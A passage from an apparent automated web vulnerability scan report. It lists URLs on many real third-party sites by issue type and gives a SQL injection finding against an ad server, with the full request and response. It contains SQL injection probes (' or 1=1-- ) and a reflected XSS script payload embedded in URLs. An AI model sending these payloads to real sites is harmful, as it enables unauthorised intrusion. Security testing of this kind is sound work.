25.52. http://www.leaseweb.com/en/vps/express-cloud/configurator/1314

25.53. http://www.leaseweb.com/js/lsw2/facebox.js

25.54. http://www.leaseweb.com/js/lsw2/jcarousellite_1.0.1.js

25.55. http://www.leaseweb.com/js/lsw2/jquery.cookie.js

25.56. https://www.leaseweb.com/js/lsw2/facebox.js

25.57. https://www.leaseweb.com/js/lsw2/jcarousellite_1.0.1.js

25.58. https://www.leaseweb.com/js/lsw2/jquery.cookie.js

25.59. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

25.60. http://www.longislanderotic.com/longislanderotic/forum/forum_closed.asp

25.61. http://www.mayerbrown.com/careers/index.asp

25.62. http://www.mayerbrown.com/careers/none

25.63. http://www.mayerbrown.com/emergingmarkets/

25.64. http://www.mayerbrown.com/emergingmarkets/none

25.65. http://www.mayerbrown.com/favicon.ico

25.66. http://www.mayerbrown.com/lawyers/none

25.67. http://www.mayerbrown.com/lawyers/profile.asp

25.68. http://www.mayerbrown.com/lawyers/profile.asp

25.69. http://www.mayerbrown.com/london/index.asp

25.70. http://www.mayerbrown.com/mayerbrownjsm/index.asp

25.71. http://www.mayerbrown.com/practice/none

25.72. http://www.mayerbrown.com/practice/practicegroups.asp

25.73. http://www.millerwelds.com/includes/DD_roundies_0.0.2a-min.js

25.74. http://www.ngi.it/F3/

25.75. http://www.ngi.it/F6/

25.76. http://www.ngi.it/corporate/adv.asp

25.77. http://www.ngi.it/f6/index.asp

25.78. http://www.ngi.it/ipass/contatti.asp

25.79. https://www.ngi.it/F3/

25.80. https://www.ngi.it/F6/

25.81. https://www.ngi.it/arAgenti/

25.82. https://www.ngi.it/arDealer/

25.83. https://www.ngi.it/corporate/adv.asp

25.84. https://www.ngi.it/gwHW/contatti.asp

25.85. https://www.ngi.it/gwHW/faq.asp

25.86. https://www.ngi.it/gwHW/resi.asp

25.87. http://www.nike.com/nikeos/global/js/jquery.cookie.js

25.88. http://www.nike.com/nikeos/global/js/jquery.dimensions.pack.js

25.89. http://www.nike.com/nikeos/global/js/plugins/jquery.cookie.js

25.90. http://www.nike.com/nikeos/p/usnikefootball/lang_LO/utilities/compress

25.91. http://www.powerblockswag.com/

25.92. http://www.powerblockswag.com/11_Xtreme_4x4_Skull_Tee_Charcoal_p/xt-07.htm

25.93. http://www.powerblockswag.com/ShoppingCart.asp

25.94. https://www.powerblockswag.com/login.asp

25.95. http://www.powerblocktv.com/site3/media/system/js/caption.js

25.96. http://www.powerblocktv.com/site3/plugins/system/rokbox/rokbox.js

25.97. http://www.powerblocktv.com/site3/templates/rt_hyperion_j15/js/rokmenuslide.js

25.98. http://www.powerblocktv.com/site3/templates/rt_hyperion_j15/js/roktop-panel.js

25.99. http://www.rewardsnetwork.com/

25.100. http://www.rewardsnetwork.com/flash/ticker/AC_RunActiveContent.js

25.101. http://www.rockyou.com/checkuser.php

25.102. http://www.rockyou.com/js/lightbox/prototype.js

25.103. http://www.rockyou.com/login.php

25.104. http://www.rockyou.com/privacypolicy.php

25.105. http://www.rockyou.com/rymini/

25.106. http://www.rockyou.com/rymini/index.html

25.107. http://www.rockyou.com/rymini/pdf/playdemic.pdf

25.108. http://www.rockyou.com/tos.php

25.109. https://www.rockyou.com/login/

25.110. https://www.rockyou.com/login/index.php

25.111. http://www.sundiogroup.com/contact.html

25.112. http://www.tmhlo.jp/

25.113. http://www.viglink.com/

25.114. http://www.viglink.com/corp/merchants

25.115. http://www.viglink.com/users/login

25.116. https://www.viglink.com/users/login

25.117. https://www.webmaillive.co.uk/Login.aspx

25.118. https://www.webmaillive.co.uk/Login.aspx/%22ns=%22netsparker(0x00004F)

25.119. http://www.yankeespirits.com/index.php

25.120. http://www.ypg.com/en/contact-us

25.121. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

25.122. http://www.ypg.com/en/images/loading.gif

25.123. http://www.ypg.com/js/jquery/plugins/jquery.cookie.js

25.124. http://xss.cx//examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

25.125. http://xss.cx/examples/dork/lawyers/xss-dork-lawyer-cross-site-scripting-curtiscom.html

25.126. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

25.127. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-dork-leasewebcom.html

25.128. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

25.129. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

25.130. http://xss.cx/examples/dork/xss/xss-dork-msnfoxsportscom-xss-cross-site-scripting.html

25.131. http://xss.cx/examples/netsparker/stored-xss-permanent-www.ngi.it_443.htm

25.132. http://xss.cx/examples/netsparker/www.ypg.com_80.htm

25.133. http://xss.cx/x/b/blekko.com_443.htm

25.134. http://xss.cx/x/b/xss-cross-site-scripting-cwe79-capec86.blekko.com.html

25.135. http://yankeespirits.com/

26. Private IP addresses disclosed

26.1. http://community.martindale.com/groups/groupdirectory.aspx

26.2. http://community.martindale.com/upgrade-your-connected-account.aspx

26.3. http://connect.facebook.net/en_US/all.js

26.4. http://digg.com/submit

26.5. http://digg.com/submit

26.6. http://mochibot.com/mochiSWF

26.7. http://mochibot.com/mochiSWF

26.8. http://mochibot.com/mochiSWF

26.9. http://mochibot.com/my/core.swf

26.10. http://mochibot.com/my/core.swf

26.11. http://mochibot.com/my/core.swf

26.12. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.13. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.14. http://static.ak.fbcdn.net/connect/xd_proxy.php

26.15. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/tzS9q4SS9zy.css

26.16. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/xvZj_SKjjya.js

26.17. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/wFcdvtg8yWA.js

26.18. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

26.19. http://www.facebook.com/extern/login_status.php

26.20. http://www.facebook.com/extern/login_status.php

26.21. http://www.facebook.com/extern/login_status.php

26.22. http://www.facebook.com/extern/login_status.php

26.23. http://www.facebook.com/extern/login_status.php

26.24. http://www.facebook.com/plugins/like.php

26.25. http://www.facebook.com/plugins/like.php

26.26. http://www.facebook.com/plugins/like.php

26.27. http://www.facebook.com/plugins/like.php

26.28. http://www.facebook.com/plugins/likebox.php

26.29. http://www.facebook.com/plugins/likebox.php

26.30. http://www.facebook.com/plugins/likebox.php

26.31. http://www.facebook.com/plugins/likebox.php

26.32. http://www.facebook.com/plugins/likebox.php

26.33. http://www.google.com/sdch/rU20-FBA.dct

26.34. http://www.millerwelds.com/about/images/CorpBldg200.jpg

26.35. http://www.millerwelds.com/about/images/careerbg.gif

26.36. http://www.millerwelds.com/about/images/fake-background.png

26.37. http://www.millerwelds.com/about/images/newsreleasebg.gif

26.38. http://www.millerwelds.com/about/images/ourcompanybg.gif

26.39. http://www.millerwelds.com/about/images/thtabs.gif

26.40. http://www.millerwelds.com/about/images/tradeshowbg.gif

26.41. http://www.millerwelds.com/fabtech/images/blog-icon.gif

26.42. http://www.millerwelds.com/fabtech/images/facebook-icon.gif

26.43. http://www.millerwelds.com/fabtech/images/flickr-icon.gif

26.44. http://www.millerwelds.com/fabtech/images/forum-icon.gif

26.45. http://www.millerwelds.com/fabtech/images/twitter-icon.gif

26.46. http://www.millerwelds.com/fabtech/images/youtube-icon.gif

26.47. http://www.millerwelds.com/favicon.ico

26.48. http://www.millerwelds.com/financing/images/darkhead_min.png

26.49. http://www.millerwelds.com/financing/images/lighthead_min.png

26.50. http://www.millerwelds.com/financing/images/plinenavbody_min.png

26.51. http://www.millerwelds.com/financing/images/plinenavfoot_min.png

26.52. http://www.millerwelds.com/financing/images/plinenavhead_min.png

26.53. http://www.millerwelds.com/financing/images/powerline_bg.png

26.54. http://www.millerwelds.com/financing/images/powerline_head.png

26.55. http://www.millerwelds.com/images/ads/powerLINEad.png

26.56. http://www.millerwelds.com/images/footer-social-sprite.jpg

26.57. http://www.millerwelds.com/images/go-search.jpg

26.58. http://www.millerwelds.com/images/logo_printable.gif

26.59. http://www.millerwelds.com/images/nav-new/aboutus.gif

26.60. http://www.millerwelds.com/images/nav-new/blog.gif

26.61. http://www.millerwelds.com/images/nav-new/forums.gif

26.62. http://www.millerwelds.com/images/nav-new/indust_interests.gif

26.63. http://www.millerwelds.com/images/nav-new/powerclick01.gif

26.64. http://www.millerwelds.com/images/nav-new/products.gif

26.65. http://www.millerwelds.com/images/nav-new/resources.gif

26.66. http://www.millerwelds.com/images/nav-new/service.gif

26.67. http://www.millerwelds.com/images/nav-new/wheretobuy.gif

26.68. http://www.millerwelds.com/images/navicons.png

26.69. http://www.millerwelds.com/images/pdf_icon2.gif

26.70. http://www.millerwelds.com/images/products/accessories/242718.jpg

26.71. http://www.millerwelds.com/images/products/accessories/243786.jpg

26.72. http://www.millerwelds.com/images/products/accessories/245586.jpg

26.73. http://www.millerwelds.com/images/products/accessories/IntCmlkTwcoAdap.jpg

26.74. http://www.millerwelds.com/images/products/mini/ISO9001.jpg

26.75. http://www.millerwelds.com/images/tab-accessories.gif

26.76. http://www.millerwelds.com/images/tab.gif

26.77. http://www.millerwelds.com/interests/projects/ideagallery/images/shareicons.png

26.78. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

26.79. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

26.80. http://www.millerwelds.com/products/accessories/images/cart.jpg

26.81. http://www.millerwelds.com/products/accessories/images/consumables.jpg

26.82. http://www.millerwelds.com/products/accessories/images/covers.jpg

26.83. http://www.millerwelds.com/products/accessories/images/guns.jpg

26.84. http://www.millerwelds.com/products/accessories/images/remote.jpg

26.85. http://www.millerwelds.com/products/accessories/images/safety.jpg

26.86. http://www.millerwelds.com/products/accessories/images/trailers.jpg

26.87. http://www.millerwelds.com/products/accessories/images/whatsnew-color.gif

26.88. http://www.millerwelds.com/products/accessories/images/workstation.jpg

26.89. http://www.millerwelds.com/products/images/compcomp/ltfl.gif

26.90. http://www.millerwelds.com/products/images/compcomp/ltfr.gif

26.91. http://www.millerwelds.com/products/images/compcomp/lthl.gif

26.92. http://www.millerwelds.com/products/images/compcomp/lthr.gif

26.93. http://www.millerwelds.com/products/images/index/tl.gif

26.94. http://www.millerwelds.com/products/images/index/tr.gif

26.95. http://www.millerwelds.com/resources/articles/images/article-bg.gif

26.96. http://www.millerwelds.com/results/blog/wp-content/plugins/ratepost/images/star_redzero16_3.gif

26.97. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints/images/rss.gif

26.98. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints2/images/diy.jpg

26.99. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints2/images/instructor.jpg

26.100. http://www.millerwelds.com/results/blog/wp-content/themes/viewpoints2/images/pro.jpg

26.101. http://www.millerwelds.com/results/blog/wp-content/uploads/CONEXPO1.jpg

26.102. http://www.millerwelds.com/results/blog/wp-content/uploads/MFT.jpg

26.103. http://www.millerwelds.com/results/blog/wp-content/uploads/P7319719_WEB1-e1300283842671-300x180.jpg

26.104. http://www.millerwelds.com/results/images/viewpoints-icon.gif

26.105. http://www.millerwelds.com/results/images/viewpoints-search.gif

26.106. http://www.millerwelds.com/results/images/whatisthis.png

26.107. http://www.millerwelds.com/service/images/consumables.jpg

26.108. http://www.millerwelds.com/service/images/locations.gif

26.109. http://www.millerwelds.com/service/images/omparts.gif

26.110. http://www.millerwelds.com/service/images/warranty.gif

26.111. http://www.millerwelds.com/wheretobuy/images/map-left.jpg

26.112. http://www.millerwelds.com/wheretobuy/images/map-right.jpg

26.113. http://www.millerwelds.com/wheretobuy/images/topleft.gif

26.114. http://www.millerwelds.com/wheretobuy/images/topright.gif

26.115. http://www.viglink.com/

26.116. http://www.viglink.com/

26.117. http://www.viglink.com/corp/merchants

26.118. http://www.viglink.com/users/login

26.119. https://www.viglink.com/users/login

26.120. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

26.121. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

27. Credit card numbers disclosed

27.1. http://reedgroup.com/zoom_index.js

27.2. http://www.rockyou.com/rymini/pdf/RockYou_Loot_Drop_Announcement.pdf

27.3. http://www.rockyou.com/rymini/pdf/playdemic.pdf

27.4. http://www.rtmtv.com/files/RTM_2011MediaKit.pdf

28. Robots.txt file

28.1. http://beacon.securestudies.com/scripts/beacon.dll

28.2. http://clients1.google.com/complete/search

28.3. http://reedgroup.com/

29. Cacheable HTTPS response

29.1. https://secure.webwiz.co.uk/clientarea/

29.2. https://secure.webwiz.co.uk/includes/default_javascript.js

29.3. https://www.idine.com/dwr/engine.js

29.4. https://www.leaseweb.com/en/shopping-cart/login

29.5. https://www.ngi.it/gwHw/productPdf/Vigor2700VG.pdf

29.6. https://www.ngi.it/include/swflash.cab

29.7. https://www.powerblockswag.com/login.asp

29.8. https://www.rockyou.com/events/include/ajaxtrackevent.php

29.9. https://www.rockyou.com/login/

29.10. https://www.rockyou.com/login/index.php

29.11. https://www.rockyou.com/resetpassword.php

29.12. https://www.webmaillive.co.uk/Login.aspx

29.13. https://www.webmaillive.co.uk/robots.txt

29.14. https://www.websitepanel.co.uk/Default.aspx

30. HTML does not specify charset

30.1. http://ad.doubleclick.net/adi/N3905.291893.COXDIGITALSOLUTIONS/B5343548

30.2. http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10

30.3. http://apps.io/user-map/IO.php

30.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.5. http://fast.fonts.com/d/319d42fd-bb57-4b3e-9525-344e63551bb0.eot

30.6. http://fast.fonts.com/d/7db71a0d-51ce-421a-9384-439ef35401bf.eot

30.7. http://jqueryui.com/themeroller/

30.8. http://longislanderotic.com/

30.9. http://longislanderotic.com/favicon.ico

30.10. http://nexus.ensighten.com/v2/cg.php

30.11. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.12. http://ping.chartbeat.net/ping

30.13. https://secure.webwiz.co.uk/includes/default_javascript.js

30.14. http://visitordrive.com/evTracker/evtracker.php

30.15. http://visitordrive.com/evTracker/services/keywords.php

30.16. http://www.curtis.com/scripts/DateRange/ipopeng.htm

30.17. http://www.google.com/recaptcha/api/noscript

30.18. http://www.gtlaw.com/ve/res/html/blank.html

30.19. http://www.gtlaw.com/ve/res/html/calendar.htm

30.20. http://www.longislanderotic.com/

30.21. http://www.longislanderotic.com/favicon.ico

30.22. http://www.longislanderotic.com/landing.html

30.23. http://www.longislanderotic.com/sitemap.xml

30.24. http://www.longislanderotic.com/terms.asp

30.25. http://www.mayerbrown.com/lawyers/profile.asp

30.26. https://www.ngi.it/gwHw/basket/

30.27. http://www.socialfollow.com/js/flash-detect.js

30.28. http://www.socialfollow.com/js/jquery.js

30.29. http://www.socialfollow.com/js/thickbox.js

30.30. http://www.socialfollow.com/js/validator.js

30.31. http://www.sundiogroup.com/

30.32. http://www.sundiogroup.com/bedrijf.html

30.33. http://www.sundiogroup.com/contact.html

30.34. http://www.sundiogroup.com/merken.html

30.35. http://www.sundiogroup.com/toerisme.html

30.36. http://www.sundiogroup.com/vacatures.html

30.37. http://xss.cx//examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

30.38. http://xss.cx/examples/dork/cookie/xss-cookie-dork-wwwaolcom.cross-site-scripting.html

30.39. http://xss.cx/examples/dork/lawyers/xss-dork-lawyer-cross-site-scripting-curtiscom.html

30.40. http://xss.cx/examples/dork/ldap/ldap-injection-springframework-example.html

30.41. http://xss.cx/examples/dork/sql-injection/sql-injection-xss-dork-rest-parameter-arbitrary-singlequote-millerweldscom.html

30.42. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-dork-leasewebcom.html

30.43. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-vanityfaircom.html

30.44. http://xss.cx/examples/dork/xss/xss-cross-site-scripting-wwwfoxsportsfloridacom-cwe79.html

30.45. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-foxsports-system-example-poc-report.html

30.46. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-humaniplexcom.html

30.47. http://xss.cx/examples/dork/xss/xss-dork-cross-site-scripting-msnwhitepagescom.html

30.48. http://xss.cx/examples/dork/xss/xss-dork-msnfoxsportscom-xss-cross-site-scripting.html

30.49. http://xss.cx/examples/dork/xss/xss-foxsportsarizona.com.cross-site-scripting.html

30.50. http://xss.cx/examples/netsparker/boolean-sql-injection-second-order-sqlinjection-wwwinsideupcom.htm

30.51. http://xss.cx/examples/netsparker/stored-xss-permanent-www.ngi.it_443.htm

30.52. http://xss.cx/examples/netsparker/www.ypg.com_80.htm

30.53. http://xss.cx/x/b/blekko.com_443.htm

30.54. http://xss.cx/x/b/xss-cross-site-scripting-cwe79-capec86.blekko.com.html

31. HTML uses unrecognised charset

31.1. http://www.ohhara-law.jp/

31.2. http://www.surugadai.org/

31.3. http://www.surugadai.org/map/index.html

31.4. http://www.surugadai.org/practice/index.html

31.5. http://www.tmhlo.jp/

31.6. http://www.tmhlo.jp/map.html

31.7. http://www.tmhlo.jp/service/index.html

31.8. http://www.tmhlo.jp/service/service.html

32. Content type incorrectly stated

32.1. http://3515178b5d.mypowerblock.ninggadgets.com/gadgets/makeRequest

32.2. http://a.rad.msn.com/ADSAdClient31.dll

32.3. http://a0.twimg.com/profile_images/388323356/falcons_normal.gif

32.4. http://a2.twimg.com/profile_images/409999693/logo_icon_normal.gif

32.5. http://adserver.adtechus.com/addyn/3.0/5124/81106/0/277/ADTECH

32.6. http://api.ning.com/icons/appatar/2170052

32.7. http://apps.io/user-map/IO.php

32.8. http://apps.rockyou.com/

32.9. http://apps.rockyou.com/favicon.ico

32.10. http://apps.rockyou.com/slideshow/readxml.php

32.11. http://apps.rockyou.com/text-undefined.swf

32.12. http://apps.rockyou.com/undefined.swf

32.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

32.14. http://content.idine.com/z/id/favicon.ico

32.15. http://event.adxpose.com/event.flow

32.16. http://goku.brightcove.com/1pix.gif

32.17. http://i.yimg.jp/images/map/icon/grabber.cur

32.18. http://jqueryjs.googlecode.com/files/jquery-1.3.1.js

32.19. http://jqueryui.com/themeroller/images/themeGallery/theme_90_ui_light.png

32.20. http://longislanderotic.com/

32.21. http://map.yahooapis.jp/MapsService/embedmap/V2/

32.22. http://map.yahooapis.jp/OpenLocalPlatform/V1/jsapi

32.23. http://map.yahooapis.jp/js/embed.js

32.24. http://modules.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

32.25. http://modules.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

32.26. http://nexus.ensighten.com/nike/serverComponent.php

32.27. http://nexus.ensighten.com/v2/cg.php

32.28. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.29. http://operatorchan.org/s/src/s17891_55111805.jpg

32.30. http://rad.msn.com/ADSAdClient31.dll

32.31. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

32.32. https://secure.webwiz.co.uk/includes/default_javascript.js

32.33. http://store.nike.com/nikestore/web/xml/nav/nav_en_US.xml

32.34. http://store.nike.com/nikestore/web/xml/nav/site.xml

32.35. http://store.nike.com/nikestore/web/xml/nav/style.xml

32.36. http://survey.112.2o7.net/survey/dynamic/suites/285/nikeall/list.js

32.37. http://vasco.com/app_pages/getDCP.aspx

32.38. http://verify.authorize.net/anetseal/images/secure90x72.gif

32.39. http://visitordrive.com/evTracker/images/spiffycal.cur

32.40. http://visitordrive.com/evTracker/services/keywords.php

32.41. http://www.aplaw.jp/css/reset.css

32.42. http://www.aplaw.jp/js/common.js

32.43. http://www.essortment.com/favicon.ico'

32.44. http://www.facebook.com/extern/login_status.php

32.45. http://www.faegre.co.uk/jscripts.js

32.46. http://www.google.com/realtimejs

32.47. http://www.google.com/recaptcha/api/reload

32.48. http://www.google.com/search

32.49. http://www.humaniplex.com/favicon.ico

32.50. http://www.idine.com/dwr/engine.js

32.51. https://www.idine.com/dwr/engine.js

32.52. http://www.invisor.net/images/invisor.net/Image/brain2(1).jpg

32.53. http://www.invisor.net/images/invisor.net/Image/coaching(1).jpg

32.54. http://www.invisor.net/images/invisor.net/Image/fish%20strategy(2).jpg

32.55. http://www.invisor.net/images/invisor.net/Image/speaking.jpg

32.56. http://www.jurists.co.jp/common/img/toppage_global-navi_bg_001.png

32.57. http://www.jurists.co.jp/favicon.ico

32.58. http://www.kslaw.com/imageserver/plumtree/portal/private/js/ptwc/3.1/postbacksupport.js

32.59. http://www.longislanderotic.com/

32.60. http://www.mayerbrown.com/images/190max/Button_Dodd-Frank-Act_Info-&-Analysis.gif

32.61. http://www.millerwelds.com/favicon.ico

32.62. http://www.nike.com/global-landing/global/xml/style.xml

32.63. http://www.nike.com/nikegolf/global/resources/xml/nav/nav-style.xml

32.64. http://www.nike.com/nikeos/global/modules/nav/xml/country/country_lockup_config_US.xml

32.65. http://www.nike.com/nikeos/global/modules/nav/xml/language/lockup_expand_translate.xml

32.66. http://www.nike.com/nikeos/p/usnikefootball/en_US/utilities/nav

32.67. http://www.noandt.com/css/default.css

32.68. http://www.noandt.com/css/import.css

32.69. http://www.noandt.com/favicon.ico

32.70. http://www.noandt.com/js/link.js

32.71. http://www.rewardsnetwork.com/favicon.ico

32.72. http://www.rockyou.com/ajaxticker.php

32.73. http://www.rockyou.com/checkuser.php

32.74. http://www.rockyou.com/create-slideshow-js-combined.php

32.75. http://www.rockyou.com/events/include/ajaxtrackevent.php

32.76. http://www.rockyou.com/homepage/js/jquery.fancybox-1.3.1/ajax.txt

32.77. http://www.rockyou.com/partner/funmobility-ajax.php

32.78. http://www.rockyou.com/show_my_gallery-ajax.php

32.79. https://www.rockyou.com/events/include/ajaxtrackevent.php

32.80. http://www.rtmtv.com/favicon.ico

32.81. http://www.socialfollow.com/blog/wp-content/uploads/2009/06/logo1.gif

32.82. http://www.socialfollow.com/js/flash-detect.js

32.83. http://www.socialfollow.com/js/jquery.js

32.84. http://www.socialfollow.com/js/thickbox.js

32.85. http://www.socialfollow.com/js/validator.js

32.86. https://www.webmaillive.co.uk/Login.aspx

32.87. http://www.ypg.com/images/imageresizer.php

32.88. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico

32.89. http://www.zoomerang.com/Survey/WEB22BZL8ZUMFQ/Image/Title/none

33. Content type is not specified

33.1. http://newton.newtonsoftware.com/favicon.ico

33.2. http://widgets.digg.com/buttons/count

33.3. http://www.duanemorris.com/favicon.ico

33.4. http://www.duanemorris.com/services



1. SQL injection
There are 127 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.amgdgt.com/ads/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 12883928'%20or%201%3d1--%20 and 12883928'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ads/?t=i&f=j&p=5958&pl=bfacb5d2&rnd=35958255594596268&clkurl=http%3a%2f%2fad.afy11.net%2fad%3fc%3dPvzB3q54uU22z7iJqgewTjgTD4yJf7mUQkeUFxZ7Ujf8kVuieLzge9FjZgOHfi5lXCYnB0a5Wjd1oUmIFCQrcv3g%2bFMGL4uTWHkOCfK0A1g%3d!&112883928'%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=6949645150452853000?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ID=AAAAAQAUlVo69RiZ0jqNPgQ_eE4qd7lFX20AAAtmYASPTEpRhaPmmXNtd4EAAAEvZiQJWw--; Domain=.amgdgt.com; Expires=Thu, 15-Apr-2021 01:05:28 GMT; Path=/
Set-Cookie: UA=AAAAAQAUshtdxv8Nep7WiQfS0VXCFGEDCiEDA3gBY2BgYGRg8rdiYHnhzcCoxcjAcOkBAwMDJ1BYP02FMxrIBgPf1fUglQwsIYwgCiwZA5ECACQyB7o-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Set-Cookie: LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; Domain=.amgdgt.com; Expires=Wed, 18-May-2011 01:05:28 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2985
Date: Mon, 18 Apr 2011 01:05:27 GMT

_321611_amg_acamp_id=151354;
_321611_amg_pcamp_id=76289;
_321611_amg_location_id=53984;
_321611_amg_creative_id=321611;
_321611_amg_loaded=true;
var _amg_321611_content='<script type="text/javascript"
...[SNIP]...
<IFRAME SRC="http://ad.doubleclick.net/adi/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n'+
'<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N553.128388.ADCONIONMEDIAGROUP/B5039995.10;abr=!ie;sz=160x600;pc=[TPAS_ID];click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU4gK.CC965aGHFPiWa82psi.l98xnZW8sdXNhLHQsMTMwMzA4ODcyODQxMixjLDMyMTYxMSxwYyw3NjI4OSxhYywxNTEzNTQsbyxOMC1TMCxsLDUzOTg0LHBjbGljayxodHRwOi8vYWQuYWZ5MTEubmV0L2FkP2M9UHZ6QjNxNTR1VTIyejdpSnFnZXdUamdURDR5SmY3bVVRa2VVRnhaN1VqZjhrVnVpZUx6Z2U5RmpaZ09IZmk1bFhDWW5CMGE1V2pkMW9VbUlGQ1FyY3YzZytGTUdMNHVUV0hrT0NmSzBBMWc9ISYxMTI4ODM5MjgnIG9yIDE9MS0tID0xCg--/clkurl=;ord=27178415?">\n'+
'</SCRIPT>\n'+
'<NOSCRIPT>\n'+
